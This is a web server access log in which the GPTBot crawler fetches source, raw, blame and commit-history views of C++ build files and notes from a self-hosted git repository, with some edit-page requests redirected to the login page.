"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode" -[17/Feb/2026:14:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21338] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13352] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" -[17/Feb/2026:14:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10465] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" -[17/Feb/2026:14:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11064] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10661] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31147] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10004] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" -[17/Feb/2026:14:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11672] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" -[17/Feb/2026:14:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15618] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" -[17/Feb/2026:14:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" -[17/Feb/2026:14:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" [Client 74.7.227.38] [Length 10383] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" -[17/Feb/2026:14:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 1597] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" -[17/Feb/2026:14:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 2917] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153741] [Gzip 15.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18931] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10066] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16083] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr 